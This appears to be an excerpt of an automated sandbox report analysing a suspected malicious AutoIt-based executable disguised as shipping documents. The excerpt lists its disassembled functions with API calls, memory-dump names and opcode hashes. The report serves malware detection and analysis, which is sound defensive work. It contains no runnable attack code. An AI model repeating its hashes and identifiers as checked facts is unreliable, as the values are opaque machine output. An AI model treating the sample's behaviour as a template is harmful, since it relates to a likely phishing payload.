                                                                                    • Instruction Fuzzy Hash: 16118E7160A305DBE7208F50EC48FA7BBFCEB01B00F1085AAA517D7990D7B8E5099FA1
                                                                                    Function 00B86FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                    • Instruction ID: 3418e9e1c4ef3e24c7146e4c22f9312883afc4e8e79c0491643a41ce0d32e664
                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                    • Instruction Fuzzy Hash: 2B014E7248814ABBCF176E84CC45CED3FA2FB18359B688495FA1858031DA36C9B1EB81
                                                                                    Function 00BDB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 00BDB2E4
                                                                                    • ScreenToClient.USER32(?,?), ref: 00BDB2FC
                                                                                    • ScreenToClient.USER32(?,?), ref: 00BDB320
                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BDB33B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 357397906-0
                                                                                    • Opcode ID: 7e15b873f28402051adb76d81d99923945748c3659b729b4f7530323f749fb9b
                                                                                    • Instruction ID: 1c6bd5756cc05913fd16eb27bab3170c3cc61474fdd64abfc55e9453be99b01f
                                                                                    • Opcode Fuzzy Hash: 7e15b873f28402051adb76d81d99923945748c3659b729b4f7530323f749fb9b
                                                                                    • Instruction Fuzzy Hash: CD112375D0420AEFDB41CF99C4449AEFBB5FB08310F108166E915A3620E735AA55DB50
                                                                                    Function 00BDB635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BDB644
                                                                                    • _memset.LIBCMT ref: 00BDB653
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C16F20,00C16F64), ref: 00BDB682
                                                                                    • CloseHandle.KERNEL32 ref: 00BDB694
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3277943733-0
                                                                                    • Opcode ID: e5739ddd76a4a19f6123e0db27a096e0ad7b31321068da5a53461731925c6b6b
                                                                                    • Instruction ID: 5a626a0c0fee26fb10ac685b5bb05f1673e9f115696f014a545f4be66c1626df
                                                                                    • Opcode Fuzzy Hash: e5739ddd76a4a19f6123e0db27a096e0ad7b31321068da5a53461731925c6b6b
                                                                                    • Instruction Fuzzy Hash: D2F05EF2541300BEE61027A5BC06FFB7A9DEB0A395F008031BA09E6192E7718C02C7A8
                                                                                    Function 00BB6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00BB6BE6
                                                                                      • Part of subcall function 00BB76C4: _memset.LIBCMT ref: 00BB76F9
                                                                                    • _memmove.LIBCMT ref: 00BB6C09
                                                                                    • _memset.LIBCMT ref: 00BB6C16
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00BB6C26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 48991266-0
                                                                                    • Opcode ID: 9b00dad0e93b82ade1ba19d23feb713cae30a8b1e173f03e691ff34a9d888619
                                                                                    • Instruction ID: b5bd35111403df36aed76332fecf3f316cc8171415854bd8f878a314e6bc4e1d
                                                                                    • Opcode Fuzzy Hash: 9b00dad0e93b82ade1ba19d23feb713cae30a8b1e173f03e691ff34a9d888619
                                                                                    • Instruction Fuzzy Hash: BFF05E3A204100ABCF016F95DC85A9ABB69EF45320F04C0A1FE099F227DB71E911CBB4
                                                                                    Function 00B52218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 00B52231
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00B5223B
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00B52250
                                                                                    • GetStockObject.GDI32(00000005), ref: 00B52258
                                                                                    • GetWindowDC.USER32(?,00000000), ref: 00B8BE83
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B8BE90
                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00B8BEA9
                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00B8BEC2
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00B8BEE2
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00B8BEED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1946975507-0
                                                                                    • Opcode ID: e26c204da0ddaa659df6d943303abfe45cdfe3ea83c32d6691b16b314793af4c
                                                                                    • Instruction ID: 7da435155b0d254b053f0a4daccae55eb9145244d1f716a18ad64891270bd946
                                                                                    • Opcode Fuzzy Hash: e26c204da0ddaa659df6d943303abfe45cdfe3ea83c32d6691b16b314793af4c
                                                                                    • Instruction Fuzzy Hash: 0DE03932109245AADF215FA4FC0DBE87B50EB15336F0483A7FA6A580F19B728980DB12
                                                                                    Function 00BA8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThread.KERNEL32 ref: 00BA871B
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00BA82E6), ref: 00BA8722
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00BA82E6), ref: 00BA872F
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00BA82E6), ref: 00BA8736
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                    • String ID:
                                                                                    • API String ID: 3974789173-0
                                                                                    • Opcode ID: d9c06e316a894be712f710db8bdea588c01021c96e492f230b8791f45da3ea69
                                                                                    • Instruction ID: 3b6046166361b8c0491f4ee9ed911b1b930273916512fdb888be166b631da968
                                                                                    • Opcode Fuzzy Hash: d9c06e316a894be712f710db8bdea588c01021c96e492f230b8791f45da3ea69
                                                                                    • Instruction Fuzzy Hash: BAE0863661A2129BD7205FF05D0CB66BBECEF51791F158869B246CB040FE348841C750
                                                                                    Function 00B75DAC Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd_noexit.LIBCMT ref: 00B75DAD
                                                                                      • Part of subcall function 00B799C4: GetLastError.KERNEL32(00000000,00B70DD3,00B78B2D,00B757A3,?,?,00B70DD3,?), ref: 00B799C6
                                                                                      • Part of subcall function 00B799C4: __calloc_crt.LIBCMT ref: 00B799E7
                                                                                      • Part of subcall function 00B799C4: __initptd.LIBCMT ref: 00B79A09
                                                                                      • Part of subcall function 00B799C4: GetCurrentThreadId.KERNEL32 ref: 00B79A10
                                                                                      • Part of subcall function 00B799C4: SetLastError.KERNEL32(00000000,00B70DD3,?), ref: 00B79A28
                                                                                    • CloseHandle.KERNEL32(?,?,00B75D8C), ref: 00B75DC1
                                                                                    • __freeptd.LIBCMT ref: 00B75DC8
                                                                                    • ExitThread.KERNEL32 ref: 00B75DD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                                                    • String ID:
                                                                                    • API String ID: 4169687693-0
                                                                                    • Opcode ID: fa626a095e48580fd264d5af3b4b600e326c3a4d16f81f2b305444f873e425c6
                                                                                    • Instruction ID: a1e569bfe738daf290f826195981e18bb1e94420de2e97f0f7af6f2d7b5c3ab6
                                                                                    • Opcode Fuzzy Hash: fa626a095e48580fd264d5af3b4b600e326c3a4d16f81f2b305444f873e425c6
                                                                                    • Instruction Fuzzy Hash: 24D0A731002F114BD63227348C0DA3977D0DF01731B05C26DF17E461F09F6058028645
                                                                                    Function 00BAB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00BAB4BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContainedObject
                                                                                    • String ID: AutoIt3GUI$Container
                                                                                    • API String ID: 3565006973-3941886329
                                                                                    • Opcode ID: df226e57cea04ed5822b0159eb267f3d8ec224ae25b53e90c35901407f06adc8
                                                                                    • Instruction ID: b2dafc0de4b592ba236d81e6bc5c7682f9f7202ed8eb534811dbb1c8f7265abd
                                                                                    • Opcode Fuzzy Hash: df226e57cea04ed5822b0159eb267f3d8ec224ae25b53e90c35901407f06adc8
                                                                                    • Instruction Fuzzy Hash: A2915970604601AFDB14DF64C894E6AB7F9FF49700F2485AEE95ACB3A2DB71E841CB50
                                                                                    Function 00BBAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • __wcsnicmp.LIBCMT ref: 00BBB02D
                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00BBB0F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                    • String ID: LPT
                                                                                    • API String ID: 3222508074-1350329615
                                                                                    • Opcode ID: d4061873e44dd037d534404ab9aa81b3c887c50b5ad3fa7749405fc618587e54
                                                                                    • Instruction ID: 5ddd50e1576a1d45483681608d5f04f161dec2ca3adae5a4e68338c1adc44c03
                                                                                    • Opcode Fuzzy Hash: d4061873e44dd037d534404ab9aa81b3c887c50b5ad3fa7749405fc618587e54
                                                                                    • Instruction Fuzzy Hash: 03613C75A10219AFCB14EF98C891EFEB7F4EB09710F1440A9F956AB291D7B0AE44CB50
                                                                                    Function 00B62957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000), ref: 00B62968
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B62981
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                    • String ID: @
                                                                                    • API String ID: 2783356886-2766056989
                                                                                    • Opcode ID: 943f2a2cc9b28e1e9cecdf5deaa5469e528a2c157a67883f8e84dbce0726019e
                                                                                    • Instruction ID: 98bb8d7a6d1f628836663cba2e255096d602cf4398d5f92825640ac3058f915c
                                                                                    • Opcode Fuzzy Hash: 943f2a2cc9b28e1e9cecdf5deaa5469e528a2c157a67883f8e84dbce0726019e
                                                                                    • Instruction Fuzzy Hash: B75137715087449BD320EF10D886BAFBBE8FB85345F41889DF6D8520A1DF71852DCB66
                                                                                    Function 00BB9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B54F0B: __fread_nolock.LIBCMT ref: 00B54F29
                                                                                    • _wcscmp.LIBCMT ref: 00BB9824
                                                                                    • _wcscmp.LIBCMT ref: 00BB9837
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                    • String ID: FILE
                                                                                    • API String ID: 4029003684-3121273764
                                                                                    • Opcode ID: 5cf7354c7ed0bc95bd8a7aa3d333347544f90907cda6870c0d07208bcca9dc82
                                                                                    • Instruction ID: 4d8f2a1c969d5c018ec2dc8628d1e22a5d5dd091499e4de9f69331b860eea55a
                                                                                    • Opcode Fuzzy Hash: 5cf7354c7ed0bc95bd8a7aa3d333347544f90907cda6870c0d07208bcca9dc82
                                                                                    • Instruction Fuzzy Hash: A041A771A00209BBDF219AA4CC86FEFBBF9DF85714F0044E9FA05A7181DBB199458B61
                                                                                    Function 00BC258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BC259E
                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BC25D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_memset
                                                                                    • String ID: |
                                                                                    • API String ID: 1413715105-2343686810
                                                                                    • Opcode ID: 72a687bfd0e66dc49784b19469873709d59c62401b11ff46260eb651c0f462dd
                                                                                    • Instruction ID: ba7e153ac77f96cd844b93e29dd6b7aa97e422f9740e94972b472a0a68c6d8c1
                                                                                    • Opcode Fuzzy Hash: 72a687bfd0e66dc49784b19469873709d59c62401b11ff46260eb651c0f462dd
                                                                                    • Instruction Fuzzy Hash: 68310771900119ABCF11EFA4DC85EEEBFB9FF08310F1040A9FD15A6162EA315A56DB60
                                                                                    Function 00BD7A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00BD7B61
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BD7B76
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: '
                                                                                    • API String ID: 3850602802-1997036262
                                                                                    • Opcode ID: fb179769f7145fcb260a652d21938c86bdf875bc1afb45240eac448090361244
                                                                                    • Instruction ID: fcd08ca8be205e14b70a1c108980abb88bd4a4dfe248e958f3563e61abce90b6
                                                                                    • Opcode Fuzzy Hash: fb179769f7145fcb260a652d21938c86bdf875bc1afb45240eac448090361244
                                                                                    • Instruction Fuzzy Hash: C0410874A4520A9FDB14CF64D891BEABBF5FB09304F1041AAE904AB391FB70A951CF90
                                                                                    Function 00BD6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00BD6B17
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BD6B53
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$DestroyMove
                                                                                    • String ID: static
                                                                                    • API String ID: 2139405536-2160076837
                                                                                    • Opcode ID: 228adba1ea41778561a42907ba75e8d4c75221d7fd9b3861b8962cf53816bf4f
                                                                                    • Instruction ID: a0cb687115e5efad7e0cac0757cc80d166c39a5dd111deb3d2bae66114882b7a
                                                                                    • Opcode Fuzzy Hash: 228adba1ea41778561a42907ba75e8d4c75221d7fd9b3861b8962cf53816bf4f
                                                                                    • Instruction Fuzzy Hash: A4316E71100604AEDB109F64CC91BFBB7E9FF48760F10856AF9A5D7290EA35AC51C760
                                                                                    Function 00BB28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB2911
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BB294C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: 0655dda8289c5e7c3f28be1c6207e88864f546cdb168880164d9c66924c42169
                                                                                    • Instruction ID: f64b5d9b2f178cf08e294511170e92a3c9342414f440a12902875c83c03271dc
                                                                                    • Opcode Fuzzy Hash: 0655dda8289c5e7c3f28be1c6207e88864f546cdb168880164d9c66924c42169
